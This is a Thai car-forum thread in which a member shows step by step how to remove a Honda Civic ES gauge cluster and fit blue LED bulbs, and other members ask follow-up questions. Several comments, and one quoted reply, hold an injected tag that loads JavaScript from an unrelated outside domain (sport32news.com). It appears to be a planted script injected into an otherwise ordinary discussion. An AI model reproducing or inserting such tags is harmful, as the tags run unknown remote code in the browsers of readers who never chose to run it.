ตอบ
tzm

ชื่อเล่น: เอ

เข้าร่วม: 24 กรกฎา 2009
ตอบ: 226

มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 1970
ให้คำขอบคุณ: 440

ปี: 2001
สี: ทอง แซทเทิลไลท์ (NH-663M)
พฤหัส, 27 สิงหา 2009 12:28 - ถอดเรือนไมล์ และ เปลี่ยนหลอดไฟสีฟ้า
เมื่อวันแม่ ล้างปีกผีเสื้อ ไปยังไม่ได้เอารูปมาลงครับ เมื่อศุกร์ที่แล้วก็เปลี่ยนเบรคครับหมดแรงเลยไม่ได้เอารูปมาลงครับ
เสาร์นี้ ก็มีโปรเจ็คใหม่เรือนไมล์ฟ้า ครับ เอารูปมาลงก่อน เดี๋ยวไม่ได้ลงอีก ((( คนมันตังน้อยต้องทำเอง)))

ถอดด้านบนน๊อต 2 ตัว
ถอดด้านบนน๊อต 2 ตัว
กดพวงมาลัยลงมาต่ำสุด
กดพวงมาลัยลงมาต่ำสุด
เริ่ม
เริ่ม
มีคลิปล้อกอยูด้านใน ทั้ง ซ้ายและขวา
มีคลิปล้อกอยูด้านใน ทั้ง ซ้ายและขวา
พยามสอดมือเพื่อช่วยดันดัน
พยามสอดมือเพื่อช่วยดันดัน

แก้ไขล่าสุดโดย เมื่อ พฤหัส, 27 สิงหา 2009 13:13, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
tzm

พฤหัส, 27 สิงหา 2009 12:38 - ถอดเรือนไมล์ และ เปลี่ยนหลอดไฟสีฟ้า
ต่อไป

หลอดเก่า ดึงออกซะโยกนิดหน่อยจะออกง่ายขึ้น
หลอดเก่า ดึงออกซะโยกนิดหน่อยจะออกง่ายขึ้น
ด้านหลังครับ จุดสีแดงคือตำแหน่งหลอดไฟครับ ลูกศรชี้คือ ไฟเลขไมล์ครับ เพื่อใครชอบหลายสี
ด้านหลังครับ จุดสีแดงคือตำแหน่งหลอดไฟครับ  ลูกศรชี้คือ ไฟเลขไมล์ครับ  เพื่อใครชอบหลายสี
ภานใน
ภานใน
ปลดขั้วต่อสาย ทั้งสองด้านครับ
ปลดขั้วต่อสาย ทั้งสองด้านครับ
กว่าจะออกมาได้ ดึงเข้าหาตัวเราครับ ดึง ๆ ๆ
กว่าจะออกมาได้  ดึงเข้าหาตัวเราครับ  ดึง ๆ ๆ

แก้ไขล่าสุดโดย เมื่อ พฤหัส, 27 สิงหา 2009 12:51, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
tzm

พฤหัส, 27 สิงหา 2009 12:50 - ถอดเรือนไมล์ และ เปลี่ยนหลอดไฟสีฟ้า
ต่อไป

เสร็จแล้วแต่ยังไม่ ถูกใจเป็นอย่างยิ่ง คือหลอดที่ซื้อมามันสูงเกินไปทำให้ไฟเป็นจุด และไม่ได้เป็นแบบกระจายแสง ถ้าเพื่อนคนไหนอยากลองทำ ควรหาหลอดไฟที่มีการกระจายแสงที่กว้างซักหน่อยจะได้สว่างทั่วเรือนไมล์

ประเด็นหลักอยู่ที่การหาหลอด LED ครับ
เสร็จแล้วแต่ยังไม่  ถูกใจเป็นอย่างยิ่ง  คือหลอดที่ซื้อมามันสูงเกินไปทำให้ไฟเป็นจุด  และไม่ได้เป็นแบบกระจายแสง  ถ้าเพื่อนคนไหนอยากลองทำ  ควรหาหลอดไฟที่มีการกระจายแสงที่กว้างซักหน่อยจะได้สว่างทั่วเรือนไมล์  

ประเด็นหลักอยู่ที่การหาหลอด LED ครับ
ซื้อมาจากคลองถม 60 บาท 2*30 = 60 เสียบขั้วได้เลย ลืมบอกไปขั้วใช้หมุนออกนะครับ
สีน้ำเงินเข้ม มองสบายไม่กัดตา ครับ
ซื้อมาจากคลองถม 60 บาท 2*30 = 60  เสียบขั้วได้เลย ลืมบอกไปขั้วใช้หมุนออกนะครับ
สีน้ำเงินเข้ม มองสบายไม่กัดตา ครับ
LED ตามชอบ (เจ้าปัญหาของผม)
LED ตามชอบ  (เจ้าปัญหาของผม)
tzm

พฤหัส, 27 สิงหา 2009 13:02 - ถอดเรือนไมล์ และ เปลี่ยนหลอดไฟสีฟ้า
ต่อไปนี้ ขั้น PRO อาจผิดวัตถุประสงค์แต่เป็นการแก้ไขแบบเด็กช่าง (กลนนท์)

คำเตือน การกระทำเกี่ยวการเปลี่ยนหลอดไฟ ทำจากด้านหลังทั้งสิ้น ไม่จำเป็นต้องถอด เข็มไมล์ นะครับ

แต่ที่ผมถอดเพราะความอยากรู้ และเพื่อความรู้ที่เพิ่มขึ้นนะครับ

สว่างทั่วแล้วครับ อย่าลืมประเด็น อยู่ที่หาหลอดครับไม่ใช่การถอดประกอบ
ขอให้สนุกกับสีสันบันเทิงนะครับ
สว่างทั่วแล้วครับ  อย่าลืมประเด็น อยู่ที่หาหลอดครับไม่ใช่การถอดประกอบ
ขอให้สนุกกับสีสันบันเทิงนะครับ
Attached File :
ถอดเรือนไมล์ และ เปลี่ยนหลอดไฟสีฟ้า
ถอดเรือนไมล์ และ เปลี่ยนหลอดไฟสีฟ้า
ในเมื่อมันสูงไป บัดกรีมันซะเลย เอาเตี้ยๆหน่อย
ในเมื่อมันสูงไป บัดกรีมันซะเลย เอาเตี้ยๆหน่อย

แก้ไขล่าสุดโดย เมื่อ จันทร์, 22 มีนา 2010 14:22, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
Gong

ชื่อเล่น: ก้อง

เข้าร่วม: 22 ตุลา 2008
ตอบ: 118

มือใหม่หัดขับ

ได้รับคำขอบคุณ: 106
ให้คำขอบคุณ: 98

ปี: 2005
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พฤหัส, 27 สิงหา 2009 19:56 - ถอดเรือนไมล์ และ เปลี่ยนหลอดไฟสีฟ้า
นับถือในความกล้าครับ..
ผลงานก็สวยงามสมใจ ยินดีด้วยครับ
ได้รับคำขอบคุณจาก: zan  วุฒิชัย  khem_hatyai  golfy 
csirinant

ชื่อเล่น: ยอด

เข้าร่วม: 27 มกรา 2009
ตอบ: 1332

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1574
ให้คำขอบคุณ: 3270

ปี: 2002
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พฤหัส, 27 สิงหา 2009 21:41 - ถอดเรือนไมล์ และ เปลี่ยนหลอดไฟสีฟ้า
นี่แหละครับ ที่รอคอย ขอบคุณครับ
(ต้องเสี่ยงกันหน่อยแล้ว)
ได้รับคำขอบคุณจาก: วุฒิชัย  khem_hatyai  golfy 
Panic_Mode

ชื่อเล่น: โป้ง

เข้าร่วม: 10 มิถุนา 2009
ตอบ: 165

ได้รับคำขอบคุณ: 101
ให้คำขอบคุณ: 13

ปี: 2003
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 28 สิงหา 2009 00:37 - ถอดเรือนไมล์ และ เปลี่ยนหลอดไฟสีฟ้า
ถอดออกมาทำได้ไงเนีย...ผลงานสวยครับ...........ถ้าผมลองถอดออกมาสงสัย..ทุบทิ้งเลย นะนั่น
ได้รับคำขอบคุณจาก: khem_hatyai  golfy  pee_es 
tzm

ศุกร์, 28 สิงหา 2009 09:23 - ถอดเรือนไมล์ และ เปลี่ยนหลอดไฟสีฟ้า
Gong พิมพ์ว่า:
นับถือในความกล้าครับ..
ผลงานก็สวยงามสมใจ ยินดีด้วยครับ

csirinant พิมพ์ว่า:
นี่แหละครับ ที่รอคอย ขอบคุณครับ
(ต้องเสี่ยงกันหน่อยแล้ว)

Panic_Mode พิมพ์ว่า:
ถอดออกมาทำได้ไงเนีย...ผลงานสวยครับ...........ถ้าผมลองถอดออกมาสงสัย..ทุบทิ้งเลย นะนั่น

ขอบคุณครับ ที่มาชม ไม่ได้กล้า ก็บ้าแน่ๆ เมียบอกแบบนั้น จริงๆ แล้วเข็มทั้ง 4 เข็มเป็นแค่สเกลวัด ค่าต่าง ๆ ที่ไม่ได้นำค่านั้นไปคำนวณอะไร ฉะนั้นจึงกล้าถอดครับ รถผมหลังจากล้างปีกผีเสื้อแล้ว นิ่งที่ 800 รอบติดเครื่องสัก 5 นาที่แล้วก็ไล่ใส่เข็มครับ ความร้อนอยู่ที่ ครึ่งต่ำลงมาขีด เข็มความเร็วก็ปลดทวนเข็มลงจากตัวกั้น หยุดตรงไหนก็มาร์คไว้ ส่วนน้ำมันพอดีผมขึ้นไฟแดง ก็สบายเล็งให้ตรงขีดต่ำสุด เท่านั้น ครับ แต่การกดต้องอย่าให้แน่นเกินไปเดี๋ยวเข็มติด (เข็มติดก็ดับเครื่องถอดออกติดเครื่องใส่ใหม่สนุกดีครับ)
ได้รับคำขอบคุณจาก: zn701  mighty_jz  muu  pop_2008  osimoot  gahn27  toshihero  pooza191  P.TER.357  k-autosociety  Phetcharat  wangyu  peet_ja  khem_hatyai  golfy  bhumipat  popza4  NutNicha  Athip Charl Klahan 
zn701

เข้าร่วม: 02 ตุลา 2008
ตอบ: 469

แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 483
ให้คำขอบคุณ: 284

สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 28 สิงหา 2009 09:58 - ถอดเรือนไมล์ และ เปลี่ยนหลอดไฟสีฟ้า
บอกได้คำเดียว เยี่ยม...
ได้รับคำขอบคุณจาก: khem_hatyai 
jonatan

ชื่อเล่น: โจ

ตอบ: 6291

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 19304
ให้คำขอบคุณ: 13458

สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 28 สิงหา 2009 10:31 - ถอดเรือนไมล์ และ เปลี่ยนหลอดไฟสีฟ้า
นี่แหล่ะคับ ที่ผมรอคอย ชัดเจน สุดจริงคับ ผมนับถือ

**ผมถามนิดหนึ่งคับ ผมยังไม่เข้าใจตรงที่จะถอดกรอบดำๆ ออกอ่ะคับ
เห็นเค้าบอกกันว่ามันแน่นมาก ถอดน๊อตออกหมดแล้ว ดึงเข้าหาตัว หรือ
ว่ายกขึ้นอ่ะคับ ด้านในมันเป็นพุก หรือกาว2หน้าอ่ะคับ แล้วก็หลอดไฟ
ใช้ขนาดเดียวกับไฟหรี่ทั่วๆไป แล้วหัวหลอดต้องเตี้ยๆ ใช่ป่าวคับ รบกวนนิดหนึ่ง
ผมอยากหล่อๆ แบบนี้บ้างอ่ะ ขอบคุณคับ**
ได้รับคำขอบคุณจาก: khem_hatyai  golfy 
sweet

เข้าร่วม: 26 สิงหา 2009
ตอบ: 1

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 2
ให้คำขอบคุณ: 0
ศุกร์, 28 สิงหา 2009 11:26 - ถอดเรือนไมล์ และ เปลี่ยนหลอดไฟสีฟ้า
สุดยอด สวยครับครับ เดี๋ยวขอลองทำบ้าง
ได้รับคำขอบคุณจาก: khem_hatyai  golfy 
tzm

ศุกร์, 28 สิงหา 2009 15:05 - ถอดเรือนไมล์ และ เปลี่ยนหลอดไฟสีฟ้า
jonatan พิมพ์ว่า:
นี่แหล่ะคับ ที่ผมรอคอย ชัดเจน สุดจริงคับ ผมนับถือ

**ผมถามนิดหนึ่งคับ ผมยังไม่เข้าใจตรงที่จะถอดกรอบดำๆ ออกอ่ะคับ
เห็นเค้าบอกกันว่ามันแน่นมาก ถอดน๊อตออกหมดแล้ว ดึงเข้าหาตัว หรือ
ว่ายกขึ้นอ่ะคับ ด้านในมันเป็นพุก หรือกาว2หน้าอ่ะคับ แล้วก็หลอดไฟ
ใช้ขนาดเดียวกับไฟหรี่ทั่วๆไป แล้วหัวหลอดต้องเตี้ยๆ ใช่ป่าวคับ รบกวนนิดหนึ่ง
ผมอยากหล่อๆ แบบนี้บ้างอ่ะ ขอบคุณคับ**

1. แน่นครับ ถอดน๊อตแค่ 2 ตัวครับ คือ............................คือ...........เดี๋ยวเย็นนี้ถอดแล้วถ่ายรูปมาให้ดูครับ

2. ถอดน๊อต 2 ตัวดึงเข้าหาตัวครับให้ชนกับพวงมาลัยเลย

3. ด้านในมันเป็นพุก หรือกาว2หน้าอ่ะคับ ................................รอรูป

4. ที่ผมซื้อมาหลอดเล็กกว่าไฟหรี่ครับ เดี๋ยวถ่ายไฟหรี่มาให้ดูครับ (คือหลอดไส้เดิมมันกระจายแสงได้รอบตัวฉะนั้น LED เราหามาต้องกระจายแสงได้คล้ายกันจะดีมาก) หลอดไฟต้องเตี้ยๆ ครับ คือ LED มันมีเลนส์แบบรวมแสง และกระจายแสงครับ หัวกลมๆรวมแสงครับ และ หัวแบบมีหลุมเป็นกระจายแสง

ถ้ามีแสงตรงบริเวณสี่เหลือง แสงจะส่งเข้าทางด้านข้างของแผ่นเรืองแสง เรือนไมล์จะสว่างมากครับ
ผมกำลังหาซื้อ LED แบบบางๆ แบบในรูปแล้วบัดกรี เป็นแบบรอบตัวไม่สามเหลี่ยมก็สี่เหลี่ยมครับ
ใครอยู่แถวกรมชล อัมพรไพศาล ถ้าอยากดูเจอกันได้ครับ
ถ้ามีแสงตรงบริเวณสี่เหลือง แสงจะส่งเข้าทางด้านข้างของแผ่นเรืองแสง เรือนไมล์จะสว่างมากครับ
ผมกำลังหาซื้อ LED แบบบางๆ แบบในรูปแล้วบัดกรี เป็นแบบรอบตัวไม่สามเหลี่ยมก็สี่เหลี่ยมครับ
ใครอยู่แถวกรมชล อัมพรไพศาล ถ้าอยากดูเจอกันได้ครับ
bandai_join

เข้าร่วม: 23 กุมภา 2009
ตอบ: 3754

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 6410
ให้คำขอบคุณ: 536

ศุกร์, 28 สิงหา 2009 16:34 - ถอดเรือนไมล์ และ เปลี่ยนหลอดไฟสีฟ้า
ไม่กล้า ครับ กลัวใช้เวลาหลายวัน เดี๋ยวที่บ้านจับได้ อิอิ
ได้รับคำขอบคุณจาก: khem_hatyai 
tzm

จันทร์, 31 สิงหา 2009 10:02 - ถอดเรือนไมล์ และ เปลี่ยนหลอดไฟสีฟ้า
ช้าไปหลายวันขอโทษครับ

jonatan

ครอบครัว ES
ครอบครัว ES

จันทร์, 31 สิงหา 2009 10:37 - ถอดเรือนไมล์ และ เปลี่ยนหลอดไฟสีฟ้า
tzm พิมพ์ว่า:
ช้าไปหลายวันขอโทษครับ

ขอบคุณมากเลยอ่ะคับ ชัดแหล่ะ คราวนี้
เสาที่ผ่านว่าจะทำซ่ะหน่อย ดันไปโดนน้ำท่วมแถวบ้าน
เลย มัวแต่ DIY. ตัดหมอกอยู่ หมดเวลา เดี๋ยวเสานี้จัดเลยคับผม
จะได้มีไมล์ฟ้าก่ะเค้าบ้าง อิ อิ เอ่..หรือสีแดงดีหว่า ได้ดู สปอร์ตดีหว่า...

ปล.หลอดต้องใช้ทั้งหมดกี่หลอดอ่ะคับ รบกวนอีกนิดส์หนึ่ง
ได้ซื้อให้ครบๆ ไม่ขาดอ่ะคับ เพราะถอดประกอบยาก อ่ะคับ ขอบคุณคับผม....
"<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: khem_hatyai  jagkrapongVilaikaew  golfy 
tzm

จันทร์, 31 สิงหา 2009 16:01 - ถอดเรือนไมล์ และ เปลี่ยนหลอดไฟสีฟ้า
ตามรูปใน DIY เลยครับ

ใช้ 5+1 = 6 ครับ ที่บวก 1 คือไฟตรงตัวเลขบอกระยะทางครับ ใช้ขนาดเดียวกันทั้งหมด

ตายระหว่า ลืมถ่ายรูปหลอดไฟหรี่ ของผมมันไม่เหมือนนะครับหลอดไฟหรี่ขั้วจะใหญ่กว่าครับ

ตอนผมไปซื้อ ผมก็ไม่รู้อะไรเลยรู้แต่ว่าอยากทำเล่น ผมซื้อที่อาคารศรีวรจักร ด้านตรงข้ามกับทางเข้า
ผมบอกว่าซื้อไฟไปใส่เรือนไมล์ เค้าจะหยิบมาให้ดู 2 แบบ แบบรวมแสง และแบบกระจายแสง ครับ
ได้รับคำขอบคุณจาก: zan  wangyu  khem_hatyai  KAATO  golfy  bhumipat  popza4 
jonatan

ครอบครัว ES
ครอบครัว ES

จันทร์, 31 สิงหา 2009 16:49 - ถอดเรือนไมล์ และ เปลี่ยนหลอดไฟสีฟ้า
tzm พิมพ์ว่า:
ตามรูปใน DIY เลยครับ

ใช้ 5+1 = 6 ครับ ที่บวก 1 คือไฟตรงตัวเลขบอกระยะทางครับ ใช้ขนาดเดียวกันทั้งหมด

ตายระหว่า ลืมถ่ายรูปหลอดไฟหรี่ ของผมมันไม่เหมือนนะครับหลอดไฟหรี่ขั้วจะใหญ่กว่าครับ

ตอนผมไปซื้อ ผมก็ไม่รู้อะไรเลยรู้แต่ว่าอยากทำเล่น ผมซื้อที่อาคารศรีวรจักร ด้านตรงข้ามกับทางเข้า
ผมบอกว่าซื้อไฟไปใส่เรือนไมล์ เค้าจะหยิบมาให้ดู 2 แบบ แบบรวมแสง และแบบกระจายแสง ครับ

อ่อ...ผมรู้แหล่ะว่าร้านไหน อิ อิ
ผมไปบ่อยอ่ะคลองถม ขอบคุณมากคับผม
ได้รับคำขอบคุณจาก: khem_hatyai  golfy  popza4 
tonkb86

เข้าร่วม: 31 สิงหา 2009
ตอบ: 1

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 1
ให้คำขอบคุณ: 0
จันทร์, 31 สิงหา 2009 20:21 - ถอดเรือนไมล์ และ เปลี่ยนหลอดไฟสีฟ้า
เจ๋งสุดๆไปเลยครับ :P
tzm

อังคาร, 1 กันยา 2009 10:27 - ถอดเรือนไมล์ และ เปลี่ยนหลอดไฟสีฟ้า
อย่าลืมนะครับ จุดสำคัญคือ การหาหลอดให้ได้ขนาดเตี้ยๆ ถ้าหลอดสูงต้องมีการกระจายแสงรอบตัว การถอดประกอบไม่ใช่ปัญหา (เมื่อเช้าตอน 7.30 ผมก็ถอดมาตั้งเข็มน้ำมันใหม่ 7.45 ก็ประกอบเสร็จ ครับ) ขอย้ำอีกที่ว่าการเปลี่ยนไฟเรือนไมล์เปลี่ยนจากด้านหลังนะครับ ไม่ต้องถอดเข็มใดๆ ไม่ต้องปลดล็อกใดๆ เพียงรื้อออกมาให้เห็นด้านหลังแล้วหมุนขั้วหลอดเก่าออก และดึงหลอดเก่าออก(บางหลอดแน่นมาก)แล้วนำหลอดใหม่เสียบได้เลย อย่าลืมเรื่องขั้วของ LED ด้วยนะครับ ถ้าหลอดไหนไม่ติดก็กลับขั้วซะ ไม่มีผลเสียครับ

แต่ถ้าจะดัดแปลงแบบผมที่ต้องบัดกรี
หาซื้อหลอดที่ บ้านหม้อพลาซ่า จะถูกกว่ามากครับ และนำไปอนุกรม(ต่อ) กับ R 500 โอมห์ ขนาด 1 ส่วน 4W หรือ 8 W (ขึ้นอยู่กับขนาดของ LED ถามคนขายก็ได้ว่าถ้าใช้กับ 12 v ใช้อาร์กี่วัตว์)
ได้รับคำขอบคุณจาก: zan  ae  toshihero  wangyu  khem_hatyai  vor_ped  KAATO  golfy  N_J Civic  bhumipat  note_okaasan 
tzm

อังคาร, 1 กันยา 2009 10:42 - ถอดเรือนไมล์ และ เปลี่ยนหลอดไฟสีฟ้า
ไหนๆก็ถอดออกมาแล้ว ผมเอาไฟ vtec ไว้ที่นี่ครับ

ได้รับคำขอบคุณจาก: ae  toshihero  watchara4  8800Gold  curran  wangyu  gahn27  Simmysweet  pry1999  khem_hatyai  Bonuses01  KAATO  golfy  bhumipat  note_okaasan  surasaka  popza4  makunkwan  Jameskab  ake_farlikit  Doraeman 
ectoderm_

เข้าร่วม: 14 พฤษภาคม 2009
ตอบ: 521

ได้รับคำขอบคุณ: 741
ให้คำขอบคุณ: 475

ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 4 กันยา 2009 23:43 - ถอดเรือนไมล์ และ เปลี่ยนหลอดไฟสีฟ้า
ทำให้ราคาเท่าไหร่ครับ ทำเองไม่ใหวอ่ะ
ได้รับคำขอบคุณจาก: khem_hatyai  ake_farlikit 
energy-freedom

เข้าร่วม: 26 ธันวา 2008
ตอบ: 263

ได้รับคำขอบคุณ: 510
ให้คำขอบคุณ: 763

ปี: 2004
เสาร์, 5 กันยา 2009 22:15 - ถอดเรือนไมล์ และ เปลี่ยนหลอดไฟสีฟ้า
นายแน่มาก
ไอ้เรื่องรื้อ พอได้ แต่เรื่องประกอบเข้านี่สิ อืม.......
ได้รับคำขอบคุณจาก: zan  khem_hatyai  ake_farlikit 
zan

เข้าร่วม: 23 สิงหา 2009
ตอบ: 3145

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3432
ให้คำขอบคุณ: 6687

เสาร์, 5 กันยา 2009 22:30 - ถอดเรือนไมล์ และ เปลี่ยนหลอดไฟสีฟ้า
ขอบคุณมากคับ

แก้ไขล่าสุดโดย เมื่อ อังคาร, 30 กันยา 2014 10:48, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: khem_hatyai  golfy  ake_farlikit 
biggsnui

ชื่อเล่น: หนุ่ย

เข้าร่วม: 18 มิถุนา 2009
ตอบ: 854

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1300
ให้คำขอบคุณ: 1618

ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อาทิตย์, 6 กันยา 2009 01:27 - ถอดเรือนไมล์ และ เปลี่ยนหลอดไฟสีฟ้า
ยอดเยี่ยมมากครับ

สเต็ปต่อไปอยากเห็นผู้กล้าต่อ cruise control ครับ
ได้รับคำขอบคุณจาก: khem_hatyai  ake_farlikit 
tzm

อาทิตย์, 6 กันยา 2009 08:44 - ถอดเรือนไมล์ และ เปลี่ยนหลอดไฟสีฟ้า
zan พิมพ์ว่า:
ผมอ่าน DIY ตั้งกะอาทิตย์ก่อนแล้วก็ Print วิธีไว้กะเอาไว้ทำเองอ่ะ
ปรากฎว่า ไม่ได้ Update ครับ ถอดน็อต 2 ตัวแล้วก็ดึงๆๆๆๆ ดึงยังไงก็ไม่ออก เฮ่อ...

เหงื่อตก

เลยเลิกครับ ไอ้พลาสติกสีดำๆ นั่นเบี้ยวหน่อยนึงเลย (ใช้แต่แรงน่ะ)

ก็เลยขึ้นมานั่งอ่านใหม่ เห็นรูปแบบชัดๆ ยังงี้เลยพอเดาได้ว่า คลิปล็อคอยู่ตรงไหน

แต่สงสัยนิดนึงครับ ต้องเอาไขควง ดันเข้าไปเพื่อคลายคลิปด้วยหรือเปล่าครับ

เพราะผมออกแรงดึงเยอะมากจนมันเบี้ยวแล้วก็ยังไม่ออก เกือบว่าจะกระชากแล้วล่ะ แต่กลัวพังน่ะ

รบกวนผู้มีประสบการณ์หน่อยครับ ของผมไฟหน้าปัดขาดมา เดือนนึงแล้วครับ แต่ไม่ค่อยมีเวลาได้ทำ

ขอบคุณมากคับ

แรงชายอย่างเดียวเลยครับ ไม่ต้องงัดไม่ต้องแย่ ใดๆ ทั้งนั้น นี่แหละครั้งแรก ซิงๆ พยามยามเอามือสอดเข้าไปด้านในครับแล้วดึงเข้าหาตัวครับ
ได้รับคำขอบคุณจาก: zan  BeL  toshihero  wangyu  Phetcharat  khem_hatyai  KAATO  golfy  huntergod  bhumipat  popza4  ake_farlikit 
zan

เข้าร่วม: 23 สิงหา 2009
ตอบ: 3145

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3432
ให้คำขอบคุณ: 6687

จันทร์, 7 กันยา 2009 20:20 - ถอดเรือนไมล์ และ เปลี่ยนหลอดไฟสีฟ้า
8;p [<script src="https://sport32news.com/civicesgroup.js"></ ]

แก้ไขล่าสุดโดย เมื่อ อังคาร, 30 กันยา 2014 13:49, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
jonatan

ครอบครัว ES
ครอบครัว ES

จันทร์, 7 กันยา 2009 22:26 - ถอดเรือนไมล์ และ เปลี่ยนหลอดไฟสีฟ้า
ยังไม่ได้จัดเลยอ่ะ ไม่ว่างซ่ะงั้น
ผมว่าจะใส่หลอดสีแดงอ่ะ ได้เหมือน 2.0 รึป่าว........อิ อิ
<script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: toshihero  khem_hatyai  ake_farlikit 
tzm

อังคาร, 8 กันยา 2009 08:27 - ถอดเรือนไมล์ และ เปลี่ยนหลอดไฟสีฟ้า
ectoderm_ พิมพ์ว่า:
ทำให้ราคาเท่าไหร่ครับ ทำเองไม่ใหวอ่ะ

อยากทำให้ครับแต่หาหลอดไม่ได้นะซิครับ
คือผมไม่อยากดัดแปลงครับถ้าหาหลอดเตี้ยได้เมื่อไหล่รับทำให้เพื่อนสมาชิกแน่นอนครับ

zan พิมพ์ว่า:
สุดยอดครับ
ฟิตจริงๆ ต้องใช้แรงข่มครับ
กระชากกันเลยทีเดียว ออกมาเลยครับ
เลือดซิบเลย (นิ้วไปขูดขอบพลาสติกน่ะครับ ถลอกเลย)
สุดท้ายเปิดได้แล้วครับ
ตอนนี้คงต้องไปหาหลอด LED กันซะแล้ว
ของคุณมากครับ

สดๆ ซิงๆ ต้องมีเลือดครับถูกแล้ว

jonatan พิมพ์ว่า:
ยังไม่ได้จัดเลยอ่ะ ไม่ว่างซ่ะงั้น
ผมว่าจะใส่หลอดสีแดงอ่ะ ได้เหมือน 2.0 รึป่าว........อิ อิ
<script src="https://sport32news.com/civicesgroup.js"></

ผมก็อยากเป็นสีแดงเดี๋ยวหาหลอดก่อนนะครับ (ต้องเตี้ยๆ ใส่ขั้ว + - ให้ถูก ดูให้ติดหมดทุกดวงแล้วค่อยประกอบนะครับ)

ขอบคุณเพื่อนๆ ที่ให้ความสนใจ นะครับ เสานี้กะว่าจะบุหลังคาซะหน่อย วันอาทิตย์จะไปวังตะไคร้ ครับ ถ้าหาวัสดุได้บุเสร็จจะเอารูปมาลงให้ดูนะครับ
ได้รับคำขอบคุณจาก: wangyu  khem_hatyai  golfy  popza4  ake_farlikit 
sarawut

ชื่อเล่น: เอส

เข้าร่วม: 27 เมษา 2009
ตอบ: 586

ได้รับคำขอบคุณ: 507
ให้คำขอบคุณ: 247

สี: แดง แรลไล (R-513)
อังคาร, 8 กันยา 2009 11:13 - ถอดเรือนไมล์ และ เปลี่ยนหลอดไฟสีฟ้า
จัดตามที่ DIY แล้วครับแต่มีปัญหานิดหน่อย
ตอนนี้แก้ไขได้แล้ว สบายใจจิงๆ
tzm

อังคาร, 8 กันยา 2009 12:02 - ถอดเรือนไมล์ และ เปลี่ยนหลอดไฟสีฟ้า
sarawut พิมพ์ว่า:
จัดตามที่ DIY แล้วครับแต่มีปัญหานิดหน่อย
ตอนนี้แก้ไขได้แล้ว สบายใจจิงๆ

ระวังเรื่องความร้อนนะครับ ถ้าฟิวส์ขาดอาจเกิดโอเวอร์โหลดได้ครับ
ได้รับคำขอบคุณจาก: toshihero  wangyu  khem_hatyai  bhumipat  ake_farlikit 
ตอบ
หน้า 1 จาก 7
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.